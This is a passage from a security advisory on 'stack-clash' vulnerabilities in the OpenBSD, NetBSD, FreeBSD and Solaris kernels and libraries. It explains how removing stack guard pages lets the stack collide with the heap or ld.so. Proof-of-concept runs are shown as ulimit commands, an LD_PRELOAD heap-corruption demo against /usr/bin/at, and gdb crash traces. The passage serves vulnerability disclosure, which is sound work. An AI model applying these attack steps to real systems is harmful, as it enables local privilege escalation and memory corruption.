7ffbab604000-7ffbab803000 ---p 00001000 fd:00 4866583 /var/tmp/a
7ffbab803000-7ffbab804000 r--p 00000000 fd:00 4866583 /var/tmp/a
7ffbab804000-7ffbaba86000 rw-p 00000000 00:00 0
7ffbaba86000-7ffbabaab000 r-xp 00000000 fd:00 4229637 /usr/lib64/ld-2.24.so
7ffbabbef000-7ffbabca7000 rw-p 00000000 00:00 0
7ffbabca7000-7ffbabca9000 r--p 00000000 00:00 0 [vvar]
7ffbabca9000-7ffbabcab000 r-xp 00000000 00:00 0 [vdso]
7ffbabcab000-7ffbabcad000 rw-p 00025000 fd:00 4229637 /usr/lib64/ld-2.24.so
7ffbabcad000-7ffbabcae000 rw-p 00000000 00:00 0
7ffbabcaf000-7ffc0bcf0000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

========================================================================
IV.2. OpenBSD
========================================================================

========================================================================
IV.2.1. Maximum RLIMIT_STACK vulnerability (CVE-2017-1000372)
========================================================================

The OpenBSD kernel limits the maximum size of the user-space stack
(RLIMIT_STACK) to MAXSSIZ (32MB); the execve() system-call allocates a
MAXSSIZ memory region for the stack and divides it in two:

- the second part, effectively the user-space stack, is mapped
PROT_READ|PROT_WRITE at the end of this stack memory region, and
occupies RLIMIT_STACK bytes (by default 8MB for root processes, and
4MB for user processes);

- the first part, effectively a large stack guard-page, is mapped
PROT_NONE at the start of this stack memory region, and occupies
MAXSSIZ - RLIMIT_STACK bytes.
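The split of the stack region can be modeled in a few lines of Python. This sketch assumes the 32MB MAXSSIZ quoted above, and `stack_region_split()` is a hypothetical helper. Its first result matches the 24576k PROT_NONE mapping in the first procmap output below.

```python
KB = 1 << 10
MB = 1 << 20

MAXSSIZ = 32 * MB  # OpenBSD's maximum stack size, as quoted in the text


def stack_region_split(rlimit_stack):
    """Return (PROT_NONE guard bytes, PROT_READ|PROT_WRITE stack bytes)."""
    rlimit_stack = min(rlimit_stack, MAXSSIZ)  # RLIMIT_STACK cannot exceed MAXSSIZ
    return MAXSSIZ - rlimit_stack, rlimit_stack


print(stack_region_split(8 * MB))   # default for root processes
print(stack_region_split(MAXSSIZ))  # RLIMIT_STACK raised to MAXSSIZ: no guard left
```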

Unfortunately, we discovered that if an attacker sets RLIMIT_STACK to
MAXSSIZ, he eliminates the PROT_NONE part of the stack region, and hence
the stack guard-page itself (CVE-2017-1000372). For example:

# sh -c 'ulimit -S -s; procmap -a -P'
8192
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
...
14cf6000-14cfafff 20k 00000000 r-xp+ (rwx) 1/0/0 00:03 52375 - /usr/sbin/procmap [0xdb29ce10]
...
84a7b000-84a7bfff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
cd7db000-cefdafff 24576k 00000000 ---p+ (rwx) 1/0/0 00:00 0 - [ stack ]
cefdb000-cf7cffff 8148k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
cf7d0000-cf7dafff 44k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 10348k

# sh -c 'ulimit -S -s `ulimit -H -s`; procmap -a -P'
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
...
1a47f000-1a483fff 20k 00000000 r-xp+ (rwx) 1/0/0 00:03 52375 - /usr/sbin/procmap [0xdb29ce10]
...
8a3c8000-8a3c9fff 8k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
cd7c9000-cf7bffff 32732k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
cf7c0000-cf7c8fff 36k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 33992k

A remote attacker cannot exploit this vulnerability, because he cannot
modify RLIMIT_STACK; but a local attacker can set RLIMIT_STACK to
MAXSSIZ, and:

- Step 1: malloc()ate almost 2GB of heap memory, until the heap reaches
the start of the stack region;

- Steps 2 and 3: consume MAXSSIZ (32MB) of stack memory, until the
stack-pointer reaches the start of the stack region (Step 2) and moves
into the heap (Step 3);

- Step 4: smash the stack with the heap (Step 4a) or smash the heap with
the stack (Step 4b).

========================================================================
IV.2.2. Recursive qsort() vulnerability (CVE-2017-1000373)
========================================================================

To complete Step 2, a recursive function is needed, and the first
possibly recursive function that we investigated is qsort(). On the one
hand, glibc's _quicksort() function (in stdlib/qsort.c) is non-recursive
(iterative): it uses a small, specialized stack of partition structures
(two pointers, low and high), and guarantees that no more than 32
partitions (on i386) or 64 partitions (on amd64) are pushed onto this
stack, because it always pushes the larger of two sub-partitions and
iterates on the smaller partition.

On the other hand, BSD's qsort() function is recursive: it always
recurses on the first sub-partition, and iterates on the second
sub-partition; but instead, it should always recurse on the smaller
sub-partition, and iterate on the larger sub-partition (CVE-2017-1000373
in OpenBSD, CVE-2017-1000378 in NetBSD, and CVE-2017-1082 in FreeBSD).

In theory, because BSD's qsort() is not randomized, an attacker can
construct a pathological input array of N elements that causes qsort()
to deterministically recurse N times. In practice, because this qsort()
uses the median-of-three medians-of-three selection of a pivot element
(the "ninther"), our attack constructs an input array of N elements that
causes qsort() to recurse N/4 times.
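The difference between the two recursion strategies can be shown with a minimal Python sketch. It assumes a plain Lomuto partition with the last element as pivot, not BSD's median-of-three "ninther" selection, so it does not reproduce the N/4 figure above. `quicksort_first()` mimics the recurse-on-first-sub-partition pattern. `quicksort_smaller()` follows the recurse-on-smaller, iterate-on-larger pattern. Both are hypothetical names and return the maximum recursion depth reached.

```python
def _partition(a, lo, hi):
    """Lomuto partition of a[lo..hi] around a[hi]; returns the pivot's final index."""
    pivot = a[hi]
    i = lo
    for j in range(lo, hi):
        if a[j] <= pivot:
            a[i], a[j] = a[j], a[i]
            i += 1
    a[i], a[hi] = a[hi], a[i]
    return i


def quicksort_first(a, lo, hi, depth=1):
    """Recurse on the first sub-partition, iterate on the second.

    Returns the maximum recursion depth reached (1 = this call only).
    """
    max_depth = depth
    while lo < hi:
        p = _partition(a, lo, hi)
        max_depth = max(max_depth, quicksort_first(a, lo, p - 1, depth + 1))
        lo = p + 1
    return max_depth


def quicksort_smaller(a, lo, hi, depth=1):
    """Recurse on the smaller sub-partition, iterate on the larger one.

    Each recursive call gets at most half of the current range, so the
    depth is bounded by roughly log2(n) + 1.
    """
    max_depth = depth
    while lo < hi:
        p = _partition(a, lo, hi)
        if p - lo < hi - p:
            max_depth = max(max_depth, quicksort_smaller(a, lo, p - 1, depth + 1))
            lo = p + 1
        else:
            max_depth = max(max_depth, quicksort_smaller(a, p + 1, hi, depth + 1))
            hi = p - 1
    return max_depth


data = list(range(400))  # already sorted: the worst case for a last-element pivot
print("recurse on first:  ", quicksort_first(data[:], 0, len(data) - 1))
print("recurse on smaller:", quicksort_smaller(data[:], 0, len(data) - 1))
```

On sorted input, the first strategy recurses once per element, while the second never recurses deeper than the logarithmic bound. This is the same reason glibc's iterative _quicksort() can use a fixed-size stack.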

========================================================================
IV.2.3. /usr/bin/at proof-of-concept
========================================================================

/usr/bin/at is SGID-crontab (which can be escalated to full root
privileges) because it must be able to create ("at -t"), list ("at -l"),
and remove ("at -r") job-files in the /var/cron/atjobs directory:

-r-xr-sr-x 4 root crontab 31376 Jul 26 2016 /usr/bin/at
drwxrwx--T 2 root crontab 512 Jul 26 2016 /var/cron/atjobs

To demonstrate that OpenBSD's RLIMIT_STACK and qsort() vulnerabilities
can be transformed into powerful primitives such as heap corruption, we
developed a proof-of-concept against "at -l" (the list_jobs() function):

- Step 1 (Clash): first, list_jobs() malloc()ates an atjob structure for
each file in /var/cron/atjobs -- if we create 40M job-files, then the
heap reaches the stack, but we do not exhaust the address-space;

- Steps 2 and 3 (Run and Jump): second, list_jobs() qsort()s the
malloc()ated jobs -- if we construct their time-stamps with our
qsort() attack, then we can cause qsort() to recurse 40M/4=10M times
and consume at least 10M*4B=40MB of stack memory (each recursive call
to qsort() consumes at least 4B, the return-address) and move the
stack-pointer into the heap;

- Step 4b (Smash the heap with the stack): last, list_jobs() free()s the
malloc()ated jobs, and abort()s with an error message -- OpenBSD's
hardened malloc() implementation detects that the heap has been
corrupted by the last recursive calls to qsort().

This naive version of our /usr/bin/at proof-of-concept poses two major
problems:

- Our pathological input array of N=40M elements cannot be sorted (Step
2 never finishes because it exhibits qsort()'s worst-case behavior,
N^2). To solve this problem, we divide the input array in two:

. the first, pathological part contains only n=(33MB/176B)*4=768K
elements that are needed to complete Steps 2 and 3, and cause
qsort() to recurse n/4 times and consume (n/4)*176B=33MB of stack
memory (MAXSSIZ+1MB) as each recursive call to qsort() consumes 176B
of stack memory;

. the second, innocuous part contains the remaining N-n=39M elements
that are needed to complete Step 1, but not Steps 2 and 3, and are
therefore swapped into the second, iterative partition of the first
recursive call to qsort().

- We were unable to create 40M files in /var/cron/atjobs: after one
week, OpenBSD's default filesystem (ffs) had created only 4M files,
and the rate of file creation had dropped from 25 files/second to 4
files/second. We did not solve this problem, but nevertheless wanted
to validate our proof-of-concept:

. we transformed it into an LD_PRELOAD library that intercepts calls
to readdir() and fstatat(), and pretends that our 40M files in
/var/cron/atjobs exist;

. we made /var/cron/atjobs world-readable and LD_PRELOADed our library
into a non-SGID copy of /usr/bin/at;

. after about an hour, "at" reports random heap corruptions:

# chmod o+r /var/cron/atjobs
# chmod o+r /var/cron/at.deny

$ ulimit -c 0
$ ulimit -S -d `ulimit -H -d`
$ ulimit -S -s `ulimit -H -s`
$ ulimit -S -a
...
coredump(blocks) 0
data(kbytes) 3145728
stack(kbytes) 32768
...
$ cp /usr/bin/at .

$ LD_PRELOAD=./OpenBSD_at.so ./at -l -v -q x > /dev/null
initializing jobkeys
finalizing jobkeys
reading jobs
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
sorting jobs
at(78717) in free(): error: chunk info corrupted
Abort trap

$ LD_PRELOAD=./OpenBSD_at.so ./at -l -v -q x > /dev/null
initializing jobkeys
finalizing jobkeys
reading jobs
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
sorting jobs
at(14184) in free(): error: modified chunk-pointer 0xcd6d0120
Abort trap

========================================================================
IV.3. NetBSD
========================================================================

Like OpenBSD, NetBSD is vulnerable to the maximum RLIMIT_STACK
vulnerability (CVE-2017-1000374): if a local attacker sets RLIMIT_STACK
to MAXSSIZ, he eliminates the PROT_NONE part of the stack region -- the
stack guard-page itself. Unlike OpenBSD, however, NetBSD:

- defines MAXSSIZ to 64MB on i386 (128MB on amd64);

- maps the run-time link-editor ld.so directly below the stack region,
even if ASLR is enabled (CVE-2017-1000375):

$ sh -c 'ulimit -S -s; pmap -a -P'
2048
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 21706 - /usr/bin/pmap [0xc5c8f0b8]
...
bbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]
bbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
bbc00000-bf9fffff 63488k 00000000 ---p+ (rwx) 1/0/0 00:00 0 - [ stack ]
bfa00000-bfbeffff 1984k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
bfbf0000-bfbfffff 64k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 9528k

$ sh -c 'ulimit -S -s `ulimit -H -s`; pmap -a -P'
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 21706 - /usr/bin/pmap [0xc5c8f0b8]
...
bbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]
bbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
bbc00000-bfbeffff 65472k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
bfbf0000-bfbfffff 64k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 73016k

# cp /usr/bin/pmap .
# paxctl +A ./pmap
# sh -c 'ulimit -S -s `ulimit -H -s`; ./pmap -a -P'
Start End Size Offset rwxpc RWX I/W/A Dev Inode - File
08048000-0804dfff 24k 00000000 r-xp+ (rwx) 1/0/0 00:00 172149 - /tmp/pmap [0xc5cb3c64]
...
bbbee000-bbbfefff 68k 00000000 r-xp+ (rwx) 1/0/0 00:00 107525 - /libexec/ld.elf_so [0xc535f580]
bbbff000-bbbfffff 4k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ anon ]
bbc00000-bf1bffff 55040k 00000000 rw-p+ (rwx) 1/0/0 00:00 0 - [ stack ]
bf1c0000-bf1cefff 60k 00000000 rw-p- (rwx) 1/0/0 00:00 0 - [ stack ]
total 62580k

Consequently, a local attacker can set RLIMIT_STACK to MAXSSIZ,
eliminate the stack guard-page, and:

- skip Step 1, because ld.so's read-write segment is naturally mapped
directly below the stack region;

- Steps 2 and 3: consume 64MB (MAXSSIZ) of stack memory (for example,
through the recursive qsort() vulnerability, CVE-2017-1000378) until
the stack-pointer reaches the start of the stack region (Step 2) and
moves into ld.so's read-write segment (Step 3);

- Step 4b: smash ld.so's read-write segment with the stack.

We did not try to exploit this vulnerability, nor did we search for a
vulnerable SUID or SGID binary, but we wrote a simple proof-of-concept,
and some of the following crashes may be exploitable:

$ sh -c 'ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x04000000'
[1] Segmentation fault ./NetBSD_CVE-201...

$ sh -c 'ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x03000000'

...

$ sh -c 'ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x03ec5000'

$ sh -c 'ulimit -S -s `ulimit -H -s`; ./NetBSD_CVE-2017-1000375 0x03ec5400'
[1] Segmentation fault ./NetBSD_CVE-201...

$ sh -c 'ulimit -S -s `ulimit -H -s`; gdb ./NetBSD_CVE-2017-1000375'
GNU gdb (GDB) 7.7.1
...
(gdb) run 0x03ec5400
Program received signal SIGSEGV, Segmentation fault.
0xbbbf448d in _rtld_symlook_default () from /usr/libexec/ld.elf_so
(gdb) x/i $eip
=> 0xbbbf448d <_rtld_symlook_default+185>: mov %edx,(%esi,%edi,4)
(gdb) info registers
esi 0xbabae890 -1162155888
edi 0x0 0
...
(gdb) run 0x03ec5800
Program received signal SIGSEGV, Segmentation fault.
0xbbbf4465 in _rtld_symlook_default () from /usr/libexec/ld.elf_so
(gdb) x/i $eip
=> 0xbbbf4465 <_rtld_symlook_default+145>: mov 0x4(%ecx),%edx
(gdb) info registers
ecx 0x41414141 1094795585
...
(gdb) run 0x03ec5c00
Program received signal SIGSEGV, Segmentation fault.
0xbbbf4408 in _rtld_symlook_default () from /usr/libexec/ld.elf_so
(gdb) x/i $eip
=> 0xbbbf4408 <_rtld_symlook_default+52>: mov (%eax),%esi
(gdb) info registers
eax 0x41414141 1094795585
...

========================================================================
IV.4. FreeBSD
========================================================================

========================================================================
IV.4.1. setrlimit() RLIMIT_STACK vulnerability (CVE-2017-1085)
========================================================================

FreeBSD's kern_proc_setrlimit() function contains the following comment
and code:

/*
* Stack is allocated to the max at exec time with only
* "rlim_cur" bytes accessible. If stack limit is going
* up make more accessible, if going down make inaccessible.
*/
if (limp->rlim_cur != oldssiz.rlim_cur) {
...
if (limp->rlim_cur > oldssiz.rlim_cur) {
prot = p->p_sysent->sv_stackprot;
size = limp->rlim_cur - oldssiz.rlim_cur;
addr = p->p_sysent->sv_usrstack -
limp->rlim_cur;
} else {
prot = VM_PROT_NONE;
size = oldssiz.rlim_cur - limp->rlim_cur;
addr = p->p_sysent->sv_usrstack -
oldssiz.rlim_cur;
}
...
(void)vm_map_protect(&p->p_vmspace->vm_map,
addr, addr + size, prot, FALSE);
}

OpenBSD's and NetBSD's dosetrlimit() functions contain the same comment,
which accurately describes the layout of their user-space stack regions.
Unfortunately, FreeBSD's kern_proc_setrlimit() comment and code are
incorrect, as hinted at in exec_new_vmspace():

/*
* Destroy old address space, and allocate a new stack
* The new stack is only SGROWSIZ large because it is grown
* automatically in trap.c.
*/

and vm_map_stack_locked():

/*
* We initially map a stack of only init_ssize. We will grow as
* needed later.

where init_ssize is SGROWSIZ (128KB), not MAXSSIZ (64MB on i386),
because "init_ssize = (max_ssize < growsize) ? max_ssize : growsize;"
(and max_ssize is MAXSSIZ, and growsize is SGROWSIZ).

As a result, if a program calls setrlimit() to increase RLIMIT_STACK,
vm_map_protect() may turn a read-only memory region below the stack into
a read-write region (CVE-2017-1085), as demonstrated by the following
proof-of-concept:

% ./FreeBSD_CVE-2017-1085
Segmentation fault

% ./FreeBSD_CVE-2017-1085 setrlimit to the max
char at 0xbd155000: 41

========================================================================
IV.4.2. Stack guard-page disabled by default (CVE-2017-1083)
========================================================================

The FreeBSD kernel implements a 4KB stack guard-page, and recent
versions of the FreeBSD Installer offer it as a system hardening option.
Unfortunately, it is disabled by default (CVE-2017-1083):

% sysctl security.bsd.stack_guard_page
security.bsd.stack_guard_page: 0

========================================================================
IV.4.3. Stack guard-page vulnerabilities (CVE-2017-1084)
========================================================================

- If FreeBSD's stack guard-page is enabled, its entire logic is
implemented in vm_map_growstack(): this function guarantees a minimum
distance of 4KB (the stack guard-page) between the start of the stack
and the end of the memory region that is mapped below (but the stack
guard-page is not physically mapped into the address-space).

Unfortunately, this guarantee is given only when the stack grows down
and clashes with the memory region mapped below, but not if the memory
region mapped below grows up and clashes with the stack: this
vulnerability effectively eliminates the stack guard-page
(CVE-2017-1084). In our proof-of-concept:

. we allocate anonymous mmap()s of 4KB, until the end of an anonymous
mmap() reaches the start of the stack [Step 1];

. we call a recursive function until the stack-pointer reaches the
start of the stack and moves into the anonymous mmap() directly
below [Step 2];

. but we do not jump over the stack guard-page, because each call to
the recursive function allocates (and fully writes to) a 1KB
stack-based buffer [Step 3];

. and we do not crash into the stack guard-page, because CVE-2017-1084
has effectively eliminated the stack guard-page in Step 1.

# sysctl security.bsd.stack_guard_page=1
security.bsd.stack_guard_page: 0 -> 1

% ./FreeBSD_CVE-2017-FGPU
char at 0xbfbde000: 41

- vm_map_growstack() implements most of the stack guard-page logic in
the following code:

/*
* Growing downward.
*/
/* Get the preliminary new entry start value */
addr = stack_entry->start - grow_amount;

/*
* If this puts us into the previous entry, cut back our
* growth to the available space. Also, see the note above.
*/
if (addr < end) {
stack_entry->avail_ssize = max_grow;
addr = end;
if (stack_guard_page)
addr += PAGE_SIZE;
}

where:

. addr is the new start of the stack;

. stack_entry->start is the old start of the stack;

. grow_amount is the size of the stack expansion;

. end is the end of the memory region below the stack.

Unfortunately, the "addr < end" test should be "addr <= end": if addr,
the new start of the stack, is equal to end, the end of the memory
region mapped below, then the stack guard-page is eliminated
(CVE-2017-1084). In our proof-of-concept:

. we allocate anonymous mmap()s of 4KB, until the end of an anonymous
mmap() reaches a randomly chosen distance below the start of the
stack [Step 1];

. we call a recursive function until the stack-pointer reaches the
start of the stack, and the stack expansion reaches the end of the
anonymous mmap() below [Step 2];

. we do not jump over the stack guard-page, because each call to the
recursive function allocates (and fully writes to) a 1KB stack-based
buffer [Step 3];

. and we crash into the stack guard-page most of the time;

. but we survive with a probability of 4KB/128KB=1/32 (grow_amount is
always a multiple of SGROWSIZ, 128KB) because CVE-2017-1084 has
effectively eliminated the stack guard-page in Step 2.

% sysctl security.bsd.stack_guard_page
security.bsd.stack_guard_page: 1

% sh -c 'while true; do ./FreeBSD_CVE-2017-FGPE; done'
Segmentation fault
char at 0xbe45e000: 41; final dist 6097 (24778705)
Segmentation fault
Segmentation fault
Segmentation fault
...
Segmentation fault
Segmentation fault
Segmentation fault
char at 0xbd25e000: 41; final dist 7036 (43654012)
Segmentation fault
Segmentation fault
Segmentation fault
...
Segmentation fault
Segmentation fault
Segmentation fault
char at 0xbd29e000: 41; final dist 5331 (43390163)
Segmentation fault
Segmentation fault
Segmentation fault
...

In contrast, if FreeBSD's stack guard-page is disabled, our
proof-of-concept always survives:

# sysctl security.bsd.stack_guard_page=0
security.bsd.stack_guard_page: 1 -> 0

% sh -c 'while true; do ./FreeBSD_CVE-2017-FGPE; done'
char at 0xbe969000: 41; final dist 89894 (19488550)
char at 0xbfa6d000: 41; final dist 74525 (1647389)
char at 0xbf4df000: 41; final dist 78 (7471182)
char at 0xbe9e4000: 41; final dist 112397 (18986765)
char at 0xbf693000: 41; final dist 49811 (5685907)
char at 0xbf533000: 41; final dist 51037 (7128925)
char at 0xbd799000: 41; final dist 26043 (38167995)
char at 0xbd54b000: 11; final dist 83754 (40585002)
char at 0xbe176000: 41; final dist 36992 (27824256)
char at 0xbfa91000: 41; final dist 57449 (1499241)
char at 0xbd1b9000: 41; final dist 26115 (44328451)
char at 0xbd1c8000: 41; final dist 94852 (44266116)
char at 0xbf73a000: 41; final dist 22276 (5003012)
char at 0xbe6b1000: 41; final dist 58854 (22341094)
char at 0xbeb81000: 41; final dist 124727 (17295159)
char at 0xbfb35000: 41; final dist 43174 (829606)
...

- FreeBSD's thread library (libthr) mmap()s a secondary PROT_NONE stack
guard-page at a distance RLIMIT_STACK below the end of the stack:

# sysctl security.bsd.stack_guard_page=1
security.bsd.stack_guard_page: 0 -> 1

% sh -c 'exec procstat -v $$'
PID START END PRT RES PRES REF SHD FLAG TP PATH
2779 0x8048000 0x8050000 r-x 8 8 1 0 CN-- vn /usr/bin/procstat
...
2779 0x28400000 0x28800000 rw- 22 35 2 0 ---- df
2779 0xbfbdf000 0xbfbff000 rwx 3 3 1 0 ---D df
2779 0xbfbff000 0xbfc00000 r-x 1 1 23 0 ---- ph

% sh -c 'LD_PRELOAD=libthr.so exec procstat -v $$'
PID START END PRT RES PRES REF SHD FLAG TP PATH
2798 0x8048000 0x8050000 r-x 8 8 1 0 CN-- vn /usr/bin/procstat
...
2798 0x28400000 0x28800000 rw- 23 35 2 0 ---- df
2798 0xbbbfe000 0xbbbff000 --- 0 0 0 0 ---- --
2798 0xbfbdf000 0xbfbff000 rwx 3 3 1 0 ---D df
2798 0xbfbff000 0xbfc00000 r-x 1 1 23 0 ---- ph

Unfortunately, this secondary stack guard-page does not mitigate the
vulnerabilities that we discovered in FreeBSD's stack guard-page
implementation:

% sysctl security.bsd.stack_guard_page
security.bsd.stack_guard_page: 1

% sh -c 'LD_PRELOAD=libthr.so ./FreeBSD_CVE-2017-FGPU'
char at 0xbfbde000: 41

% sh -c 'while true; do LD_PRELOAD=libthr.so ./FreeBSD_CVE-2017-FGPE; done'
Segmentation fault
Segmentation fault
Segmentation fault
...
Segmentation fault
Segmentation fault
Segmentation fault
char at 0xbda5e000: 41; final dist 3839 (35262207)
Segmentation fault
Segmentation fault
Segmentation fault
...
Segmentation fault
Segmentation fault
Segmentation fault
char at 0xbdb1e000: 41; final dist 3549 (34475485)
Segmentation fault
Segmentation fault
Segmentation fault
...

========================================================================
IV.4.4. Remote exploitation
========================================================================

Because FreeBSD's stack guard-page is disabled by default, we tried (and
failed) to remotely exploit a test service vulnerable to:

- an unlimited memory leak that allows us to malloc()ate gigabytes of
memory;

- a limited recursion that allows us to allocate up to 1MB of stack
memory.

FreeBSD's malloc() implementation (jemalloc) mmap()s 4MB chunks of
anonymous memory that are aligned on multiples of 4MB. The first 4MB
mmap() chunk starts at 0x28400000, and the last 4MB mmap() chunk ends at
0xbf800000, because the stack occupies the next 4MB-aligned slot, which
ends at 0xbfc00000. However, this final mmap-stack distance (almost 4MB)
is impossible to cover with the limited recursion (1MB) of our test
service.

...
break(0x80499b0) = 0 (0x0)
break(0x8400000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 672845824 (0x281ad000)
mmap(0x285ad000,2437120,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 677040128 (0x285ad000)
munmap(0x281ad000,2437120) = 0 (0x0)
mmap(0x0,8388608,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 679477248 (0x28800000)
munmap(0x28c00000,4194304) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 683671552 (0x28c00000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 687865856 (0x29000000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 692060160 (0x29400000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 696254464 (0x29800000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 700448768 (0x29c00000)
...
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1103101952 (0xbe400000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1098907648 (0xbe800000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1094713344 (0xbec00000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1090519040 (0xbf000000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1086324736 (0xbf400000)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x8800000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x8c00000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x9000000) = 0 (0x0)
...
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x27c00000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x28000000) = 0 (0x0)
mmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 'Cannot allocate memory'
break(0x28400000) ERR#12 'Cannot allocate memory'

========================================================================
IV.5. Solaris >= 11.1
========================================================================

========================================================================
IV.5.1. Minimal RLIMIT_STACK vulnerability (CVE-2017-3630)
========================================================================

On Solaris, ASLR can be enabled or disabled for each ELF binary with the
SUNW_ASLR dynamic section entry (man elfedit):

$ elfdump /usr/bin/rsh | egrep 'ASLR|NX'
[39] SUNW_ASLR 0x2 ENABLE
[40] SUNW_NXHEAP 0x2 ENABLE
[41] SUNW_NXSTACK 0x2 ENABLE

Without ASLR

If ASLR is disabled:

- a stack region of size RLIMIT_STACK is reserved in the address-space;

- a 4KB stack guard-page is mapped directly below this stack region;

- the runtime linker ld.so is mapped directly below this stack
guard-page.

$ cp /usr/bin/sleep .
$ chmod u+w ./sleep
$ elfedit -e 'dyn:sunw_aslr disable' ./sleep

$ sh -c 'ulimit -S -s; ./sleep 3 & pmap -r ${!}'
8192
7176: ./sleep 3
...
FE7B1000 228K r-x---- /lib/ld.so.1
FE7FA000 8K rwx---- /lib/ld.so.1
FE7FC000 8K rwx---- /lib/ld.so.1
FE7FF000 8192K rw----- [ stack ]
total 17148K

$ sh -c 'ulimit -S -s 64; ./sleep 3 & pmap -r ${!}'
7244: ./sleep 3
...
FEFA1000 228K r-x---- /lib/ld.so.1
FEFEA000 8K rwx---- /lib/ld.so.1
FEFEC000 8K rwx---- /lib/ld.so.1
FEFEF000 64K rw----- [ stack ]
total 9020K

On the one hand, a local attacker can exploit this simplified
stack-clash:

- Step 1 (Clash) is not needed, because ld.so is naturally mapped
directly below the stack (the distance between the end of ld.so's
read-write segment and the start of the stack is 4KB, the stack
guard-page);

- Step 2 (Run) is not needed, because a local attacker can set
RLIMIT_STACK to just a few kilobytes, reserve a very small stack
region, and hence shorten the distance between the stack-pointer and
the start of the stack (and the end of ld.so's read-write segment);

- Step 3 (Jump) can be completed with a large stack-based buffer that is
not fully written to;

- Step 4b (Smash) can be completed by overwriting the function pointers
in ld.so's read-write segment with the contents of a stack-based
buffer.

Such a simplified stack-clash exploit was first mentioned in Gael
Delalleau's 2005 presentation (slide 30).

On the other hand, a remote attacker cannot modify RLIMIT_STACK and must
complete Step 2 (Run) with a recursive function that consumes the 8MB
(the default RLIMIT_STACK) between the stack-pointer and the start of
the stack.

With ASLR

If ASLR is enabled:

- a stack region of size RLIMIT_STACK is reserved in the address-space;

- a 4KB stack guard-page is mapped directly below this stack region;

- the runtime linker ld.so is mapped below this stack guard-page, but at
a random distance (within a [4KB,128MB] range) -- effectively a large,
secondary stack guard-page.

On the one hand, a local attacker can run the simplified "Without ASLR"
stack-clash exploit until the ld.so-stack distance is minimal -- with a
probability of 4KB/128MB=1/32K, the distance between the end of ld.so's
read-write segment and the start of the stack is exactly 8KB: the stack
guard-page plus the minimum distance between the stack guard-page and
ld.so (CVE-2017-3629).

On the other hand, a remote attacker must complete Step 2 (Run) with a
recursive function, and:

- has a good chance of exploiting this stack-clash after 32K connections
(when the ld.so-stack distance is minimal) if the remote service
re-execve()s (re-randomizes the ld.so-stack distance for each new
connection);

- cannot exploit this stack-clash if the remote service does not
